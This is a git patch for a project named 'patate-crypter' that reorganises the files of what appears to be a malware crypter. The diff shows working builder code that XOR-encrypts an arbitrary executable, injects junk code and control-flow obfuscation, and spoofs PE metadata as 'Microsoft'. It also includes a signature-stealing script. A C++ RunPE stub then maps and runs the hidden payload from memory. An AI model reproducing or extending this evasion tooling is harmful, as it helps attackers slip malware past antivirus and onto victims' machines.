From 6dfe690749f82fc5ec8b3e7e1f9cf2ac23ed5c25 Mon Sep 17 00:00:00 2001 From: ALittlePatate Date: Mon, 18 Mar 2024 19:30:52 +0100 Subject: [PATCH] fix: file structure, made a bit of refactor --- .gitignore | 7 +-- gui.py => Builder/gui.py | 16 +++---- gui.ui => Builder/gui.ui | 0 metadata.py => Builder/metadata.py | 4 +- obfuscation.py => Builder/obfuscation.py | 4 +- randomness.py => Builder/randomness.py | 8 +--- Builder/requirements.txt | 2 + sigthief.py => Builder/sigthief.py | 0 Crypter/config.h | 2 + main.cpp => Crypter/main.cpp | 46 +------------------ DllExecutor.rc => Crypter/patate-crypter.rc | 10 ++-- .../patate-crypter.vcxproj | 14 ++++-- .../patate-crypter.vcxproj.filters | 8 ++-- .../patate-crypter.vcxproj.user | 4 +- resource.h => Crypter/resource.h | 0 README.md | 1 + config.h | 2 - DllExecutor.sln => patate-crypter.sln | 2 +- requirements.txt | 3 -- 19 files changed, 48 insertions(+), 85 deletions(-) rename gui.py => Builder/gui.py (94%) rename gui.ui => Builder/gui.ui (100%) rename metadata.py => Builder/metadata.py (95%) rename obfuscation.py => Builder/obfuscation.py (98%) rename randomness.py => Builder/randomness.py (65%) create mode 100644 Builder/requirements.txt rename sigthief.py => Builder/sigthief.py (100%) create mode 100644 Crypter/config.h rename main.cpp => Crypter/main.cpp (77%) rename DllExecutor.rc => Crypter/patate-crypter.rc (88%) rename DllExecutor.vcxproj => Crypter/patate-crypter.vcxproj (94%) rename DllExecutor.vcxproj.filters => Crypter/patate-crypter.vcxproj.filters (96%) rename DllExecutor.vcxproj.user => Crypter/patate-crypter.vcxproj.user (65%) rename resource.h => Crypter/resource.h (100%) delete mode 100644 config.h rename DllExecutor.sln => patate-crypter.sln (89%) delete mode 100644 requirements.txt diff --git a/.gitignore b/.gitignore index 3f1fed5..2ef43c1 100644 --- a/.gitignore +++ b/.gitignore @@ -2,7 +2,8 @@ *.dll .vs __pycache__ -Debug -Release +bin +build sample.h -icon.ico \ No newline at end of file +icon.ico +settings.txt \ No newline at end of file diff --git a/gui.py b/Builder/gui.py similarity index 94% rename from gui.py rename to Builder/gui.py index 83a2ae6..14bd21b 100644 --- a/gui.py +++ b/Builder/gui.py @@ -142,7 +142,7 @@ class Ui_mainWindow(object): def generate(self) : in_filename = self.filepath - out_filename = self.pushButton.text().split(".")[0] + "_out.exe" + out_filename = "../bin/" + self.pushButton.text().split(".")[0] + "_out.exe" xor_key = '' if self.xor : @@ -160,7 +160,7 @@ class Ui_mainWindow(object): print(f"Filename : {in_filename}") file = bytearray(open(in_filename, 'rb').read()) - with open("sample.h", 'w') as output: + with open("../Crypter/sample.h", 'w') as output: output.write("unsigned char sample[] = { ") for count, byte in enumerate(file, 1): if xor_key : @@ -176,10 +176,10 @@ class Ui_mainWindow(object): QCoreApplication.processEvents() # Working with a copy of main.cpp - os.rename("main.cpp", "DO_NOT_TOUCH.cpp") - shutil.copyfile('DO_NOT_TOUCH.cpp', 'main.cpp') + os.rename("../Crypter/main.cpp", "../Crypter/DO_NOT_TOUCH.cpp") + shutil.copyfile('../Crypter/DO_NOT_TOUCH.cpp', '../Crypter/main.cpp') - with open("config.h", "w") as c : + with open("../Crypter/config.h", "w") as c : c.write(f'#pragma once\n#define KEY "{xor_key}"') self.label_2.setText("Adding junk code...") @@ -201,15 +201,15 @@ class Ui_mainWindow(object): vs_path = os.popen("\"%ProgramFiles(x86)%/Microsoft Visual Studio/Installer/vswhere.exe\" -nologo -latest -property installationPath").read().replace("\n","") #https://stackoverflow.com/questions/46223916/msbuild-exe-not-found-cmd-exe cmd_line = vs_path + "\\Msbuild\\Current\\Bin\\MSBuild.exe" - return_code = os.system("\""+cmd_line+"\" . /p:Configuration=Release;Platform=x86;OutDir=.;DebugSymbols=false;DebugType=None;Zm=5000;TargetExt=.exe;TargetName="+out_filename.replace(".exe", "")+" /t:Rebuild") + return_code = os.system("\""+cmd_line+"\" ../Crypter /p:Configuration=Release;Platform=x86;OutDir=.;DebugSymbols=false;DebugType=None;Zm=5000;TargetExt=.exe;TargetName="+out_filename.replace(".exe", "")+" /t:Rebuild") if return_code : self.label_2.setText("build failed.") QCoreApplication.processEvents() # Cleaning up.. - os.remove("main.cpp") - os.rename("DO_NOT_TOUCH.cpp", "main.cpp") + os.remove("../Crypter/main.cpp") + os.rename("../Crypter/DO_NOT_TOUCH.cpp", "../Crypter/main.cpp") # Find all BMP files in the directory with a wildcard pattern bmp_files = glob.glob(os.path.join(".", "*.bmp")) diff --git a/gui.ui b/Builder/gui.ui similarity index 100% rename from gui.ui rename to Builder/gui.ui diff --git a/metadata.py b/Builder/metadata.py similarity index 95% rename from metadata.py rename to Builder/metadata.py index 8c51f7d..b837b88 100644 --- a/metadata.py +++ b/Builder/metadata.py @@ -26,11 +26,11 @@ def generate_bmp(filename): def change_metadata(icon_file) : number_of_bmp = 0#GetRandomRange(2, 6) makes the entropy go to 7.4 for ONE image, so very very very bad - f = open("DllExecutor.rc", "r") + f = open("../Crypter/patate-crypter.rc", "r") f_c = f.readlines() f.close() - o = open("DllExecutor.rc", "w") + o = open("../Crypter/patate-crypter.rc", "w") for line in f_c : if "CompanyName" in line : line = f'\t\t\tVALUE "CompanyName", "Microsoft"\n' diff --git a/obfuscation.py b/Builder/obfuscation.py similarity index 98% rename from obfuscation.py rename to Builder/obfuscation.py index 4a7bf4d..a7e5acf 100644 --- a/obfuscation.py +++ b/Builder/obfuscation.py @@ -148,7 +148,7 @@ def GetRandomControlFlow(): return cpp_code -FILES_TO_OBFUSCATE = {"main.cpp":"DO_NOT_TOUCH.cpp"}# "getapi.cpp":"DO_NOT_TOUCH_API.cpp"} +FILES_TO_OBFUSCATE = {"../Crypter/main.cpp":"../Crypter/DO_NOT_TOUCH.cpp"}# "getapi.cpp":"DO_NOT_TOUCH_API.cpp"} def obfuscate(PASS, CFLOW_PASS, cflow, junk) : if PASS < CFLOW_PASS : PASS = CFLOW_PASS @@ -301,7 +301,7 @@ def obfuscate(PASS, CFLOW_PASS, cflow, junk) : #include \r\n #include \r\n""" - if outfile == "main.cpp" : + if outfile == "../Crypter/main.cpp" : out.insert(0, fake_api) out.insert(0, static_imports) out.insert(0, fake_libs) diff --git a/randomness.py b/Builder/randomness.py similarity index 65% rename from randomness.py rename to Builder/randomness.py index 634ecb2..b25b112 100644 --- a/randomness.py +++ b/Builder/randomness.py @@ -11,24 +11,20 @@ def GetRandomNumber() : def GetRandomRange(a, b): if a > b: - a, b = b, a # Swap a and b if a is greater than b + a, b = b, a - range_size = b - a + 1 # Calculate the size of the range + range_size = b - a + 1 - # Calculate the number of bits required to represent all values in the range num_bits = 0 while 2 ** num_bits < range_size: num_bits += 1 - # Generate a random number in binary representation using GetRandomBool() random_binary = [GetRandomBool() for _ in range(num_bits)] - # Convert the binary representation to an integer within the specified range random_integer = 0 for i, bit in enumerate(random_binary): random_integer += bit * (2 ** i) - # Map the generated integer to the desired range [a, b] mapped_value = a + random_integer if mapped_value > b : return GetRandomRange(a, b) diff --git a/Builder/requirements.txt b/Builder/requirements.txt new file mode 100644 index 0000000..df7496a --- /dev/null +++ b/Builder/requirements.txt @@ -0,0 +1,2 @@ +pillow +pywin32 \ No newline at end of file diff --git a/sigthief.py b/Builder/sigthief.py similarity index 100% rename from sigthief.py rename to Builder/sigthief.py diff --git a/Crypter/config.h b/Crypter/config.h new file mode 100644 index 0000000..9dde3f6 --- /dev/null +++ b/Crypter/config.h @@ -0,0 +1,2 @@ +#pragma once +#define KEY "" \ No newline at end of file diff --git a/main.cpp b/Crypter/main.cpp similarity index 77% rename from main.cpp rename to Crypter/main.cpp index fd3637c..076aaea 100644 --- a/main.cpp +++ b/Crypter/main.cpp @@ -55,41 +55,30 @@ void decrypt(const char* key, int offset = 0, int limit = -1) { HMODULE RunPE(const void* dll_buffer, size_t dll_size, DWORD newBase) { //START - // Check if the DLL buffer is at least as large as the size of the DOS header. if (dll_size < sizeof(IMAGE_DOS_HEADER)) { return NULL; } decrypt(KEY, 0, 1024); // decrypt only the header - // Get a pointer to the DOS header. const IMAGE_DOS_HEADER* dos_header = static_cast(dll_buffer); - // Check if the DLL buffer is at least as large as the size of the NT headers. if (dll_size < dos_header->e_lfanew + sizeof(IMAGE_NT_HEADERS)) { return NULL; } - // Get a pointer to the NT headers. const IMAGE_NT_HEADERS* nt_headers = reinterpret_cast(static_cast(dll_buffer) + dos_header->e_lfanew); - - // Check if the DLL is a valid 32-bit or 64-bit PE file. if (nt_headers->Signature != IMAGE_NT_SIGNATURE) { return NULL; } - // Calculate the size of the image. const size_t image_size = nt_headers->OptionalHeader.SizeOfImage; - - // Allocate memory for the DLL in the current process. void* image_base = VirtualAlloc((LPVOID)newBase, image_size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); if (image_base == NULL) { return NULL; } - // Get a pointer to the section headers. const IMAGE_SECTION_HEADER* section_headers = reinterpret_cast(nt_headers + 1); - // Copy the section data to the allocated memory. for (WORD i = 0; i < nt_headers->FileHeader.NumberOfSections; ++i) { const IMAGE_SECTION_HEADER* section_header = section_headers + i; @@ -100,7 +89,6 @@ HMODULE RunPE(const void* dll_buffer, size_t dll_size, DWORD newBase) DEBUG_PRINTF("[+] Wrote section data\n"); - //Rebasing symbols DEBUG_PRINTF("[+] Rebasing Dll\n"); HMODULE dll_handle = static_cast(image_base); @@ -110,46 +98,34 @@ HMODULE RunPE(const void* dll_buffer, size_t dll_size, DWORD newBase) // Get the address of the DLL's import directory. const IMAGE_IMPORT_DESCRIPTOR* import_directory = reinterpret_cast(static_cast(image_base) + nt_headers->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress); - DEBUG_PRINTF("[+] Fixing imports\n"); - // Iterate through the import directory and resolve the imported functions. + while (import_directory->Name != 0) { - // Get the name of the imported DLL. const char* import_dll_name = static_cast(image_base) + import_directory->Name; - // Load the imported DLL. HMODULE import_dll = LoadLibraryA(import_dll_name); if (import_dll == NULL) { VirtualFree(image_base, 0, MEM_RELEASE); return NULL; } - // Get the address of the imported functions. IMAGE_THUNK_DATA* import_thunk_data = reinterpret_cast(static_cast(image_base) + import_directory->FirstThunk); - // Resolve the imported functions. while (import_thunk_data->u1.AddressOfData != 0) { - // Check if the import is by ordinal if (IMAGE_SNAP_BY_ORDINAL(import_thunk_data->u1.Ordinal)) { - // Get the ordinal value DWORD ordinal = IMAGE_ORDINAL(import_thunk_data->u1.Ordinal); - // Get the address of the imported function by ordinal void* import_address = GetProcAddress(import_dll, reinterpret_cast(ordinal)); - // Write the address of the imported function to the IAT. if (import_address != nullptr) { *reinterpret_cast(import_thunk_data) = import_address; } } else { - // Get the import by name const IMAGE_IMPORT_BY_NAME* import_by_name = reinterpret_cast(static_cast(image_base) + import_thunk_data->u1.AddressOfData); - // Get the address of the imported function by name void* import_address = GetProcAddress(import_dll, reinterpret_cast(import_by_name->Name)); - // Write the address of the imported function to the IAT. if (import_address != nullptr) { *reinterpret_cast(import_thunk_data) = import_address; } @@ -163,58 +139,40 @@ HMODULE RunPE(const void* dll_buffer, size_t dll_size, DWORD newBase) DEBUG_PRINTF("[+] Doing relocation\n"); - // Get the address of the DLL's base relocation directory. const IMAGE_BASE_RELOCATION* base_relocation = reinterpret_cast(static_cast(image_base) + nt_headers->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress); - - // Calculate the delta between the original base address and the new base address. DWORD delta = newBase - nt_headers->OptionalHeader.ImageBase; - // Iterate through the base relocation directory and apply the relocations. while (base_relocation->VirtualAddress != 0) { - // Get the relocation block header. const WORD* relocation_block = reinterpret_cast(base_relocation + 1); - // Calculate the number of relocations in the current block. DWORD num_relocations = (base_relocation->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION)) / sizeof(WORD); - // Apply each relocation in the current block. for (DWORD i = 0; i < num_relocations; ++i) { - // Get the current relocation entry. WORD relocation_entry = relocation_block[i]; - // Extract the type and offset from the relocation entry. WORD type = relocation_entry >> 12; WORD offset = relocation_entry & 0xFFF; - // Get a pointer to the address to be relocated. DWORD* reloc_address = reinterpret_cast(static_cast(image_base) + base_relocation->VirtualAddress + offset); - // Apply the relocation based on the type. switch (type) { case IMAGE_REL_BASED_ABSOLUTE: - // The relocation is skipped if the type is absolute. break; case IMAGE_REL_BASED_HIGHLOW: - // Adjust the address by adding the delta. *reloc_address += delta; break; default: - // Handle other relocation types if necessary. - // ... break; } } - // Move to the next relocation block. base_relocation = reinterpret_cast(reinterpret_cast(base_relocation) + base_relocation->SizeOfBlock); } DEBUG_PRINTF("\n[+] Calling DllMain\n"); - // Call the DLL's entry point, if it has one. if (entry_point != NULL) { - // Get the address of the DLL's entry point in the IAT. void* entry_point_iat = static_cast(image_base) + nt_headers->OptionalHeader.AddressOfEntryPoint; // Cleaning @@ -255,7 +213,6 @@ int __stdcall WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpCm DEBUG_PRINTF("[+] Started\n"); - // Load the DLL from a buffer in memory const int bufferSize = sizeof(sample) / sizeof(sample[0]); HMODULE dll = RunPE(sample, bufferSize, NEW_ADDRESS); @@ -264,7 +221,6 @@ int __stdcall WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpCm return 1; } - // Free the DLL ::FreeLibrary(dll); return 0; diff --git a/DllExecutor.rc b/Crypter/patate-crypter.rc similarity index 88% rename from DllExecutor.rc rename to Crypter/patate-crypter.rc index d139624..f589799 100644 --- a/DllExecutor.rc +++ b/Crypter/patate-crypter.rc @@ -68,12 +68,12 @@ BEGIN BLOCK "040c04b0" BEGIN VALUE "CompanyName", "Microsoft" - VALUE "FileDescription", "sblujwzduxlhnhmiyiri" + VALUE "FileDescription", "qhffltbhaqzfykugipsz" VALUE "FileVersion", "1.0.0.1" - VALUE "InternalName", "tkedqel.exe" + VALUE "InternalName", "gqhfyim.exe" VALUE "LegalCopyright", "Copyright (C) 2023" - VALUE "OriginalFilename", "lgeagvp.exe" - VALUE "ProductName", "aejcvay.exe" + VALUE "OriginalFilename", "ddyshnw.exe" + VALUE "ProductName", "swtvick.exe" VALUE "ProductVersion", "1.0.0.1" END END @@ -83,7 +83,7 @@ BEGIN END END -MAINICON ICON "C:/Users/patate/Desktop/Programmation/C++/Low-Level/RunPE/icon.ico" +MAINICON ICON "C:/Users/patate/Desktop/Programmation/C++/Maldev/patate-crypter/icon.ico" #endif ///////////////////////////////////////////////////////////////////////////// diff --git a/DllExecutor.vcxproj b/Crypter/patate-crypter.vcxproj similarity index 94% rename from DllExecutor.vcxproj rename to Crypter/patate-crypter.vcxproj index 7790671..06116f1 100644 --- a/DllExecutor.vcxproj +++ b/Crypter/patate-crypter.vcxproj @@ -22,7 +22,7 @@ 16.0 Win32Proj {f2b3a240-e4b5-428f-991a-765881b2e877} - DllExecutor + patate-crypter 10.0 @@ -72,15 +72,23 @@ true + $(ProjectDir)..\bin\ + $(ProjectDir)build\ false + $(ProjectDir)..\bin\ + $(ProjectDir)build\ true + $(ProjectDir)..\bin\ + $(ProjectDir)build\ false + $(ProjectDir)..\bin\ + $(ProjectDir)build\ @@ -109,7 +117,7 @@ Disabled false EnableFastChecks - MultiThreadedDLL + MultiThreaded Windows @@ -162,7 +170,7 @@ - + diff --git a/DllExecutor.vcxproj.filters b/Crypter/patate-crypter.vcxproj.filters similarity index 96% rename from DllExecutor.vcxproj.filters rename to Crypter/patate-crypter.vcxproj.filters index 7ec23b8..db9ee56 100644 --- a/DllExecutor.vcxproj.filters +++ b/Crypter/patate-crypter.vcxproj.filters @@ -20,18 +20,18 @@ - - Fichiers d%27en-tête - Fichiers d%27en-tête Fichiers d%27en-tête + + Fichiers d%27en-tête + - + Fichiers de ressources diff --git a/DllExecutor.vcxproj.user b/Crypter/patate-crypter.vcxproj.user similarity index 65% rename from DllExecutor.vcxproj.user rename to Crypter/patate-crypter.vcxproj.user index 88a5509..966b4ff 100644 --- a/DllExecutor.vcxproj.user +++ b/Crypter/patate-crypter.vcxproj.user @@ -1,4 +1,6 @@  - + + true + \ No newline at end of file diff --git a/resource.h b/Crypter/resource.h similarity index 100% rename from resource.h rename to Crypter/resource.h diff --git a/README.md b/README.md index e0f1de0..dcceedb 100644 --- a/README.md +++ b/README.md @@ -34,5 +34,6 @@ With obfuscation (only showing a few nodes, the original graph was more than 40K # How to run ``` +cd Builder python gui.py ``` diff --git a/config.h b/config.h deleted file mode 100644 index 2583735..0000000 --- a/config.h +++ /dev/null @@ -1,2 +0,0 @@ -#pragma once -#define KEY "ugifthdrdgrd" \ No newline at end of file diff --git a/DllExecutor.sln b/patate-crypter.sln similarity index 89% rename from DllExecutor.sln rename to patate-crypter.sln index 3091ded..b2eaf02 100644 --- a/DllExecutor.sln +++ b/patate-crypter.sln @@ -3,7 +3,7 @@ Microsoft Visual Studio Solution File, Format Version 12.00 # Visual Studio Version 17 VisualStudioVersion = 17.1.32407.343 MinimumVisualStudioVersion = 10.0.40219.1 -Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "DllExecutor", "DllExecutor.vcxproj", "{F2B3A240-E4B5-428F-991A-765881B2E877}" +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "patate-crypter", "Crypter/patate-crypter.vcxproj", "{F2B3A240-E4B5-428F-991A-765881B2E877}" EndProject Global GlobalSection(SolutionConfigurationPlatforms) = preSolution diff --git a/requirements.txt b/requirements.txt deleted file mode 100644 index 3585821..0000000 --- a/requirements.txt +++ /dev/null @@ -1,3 +0,0 @@ -OpenSSL -pillow -pywin32==302 \ No newline at end of file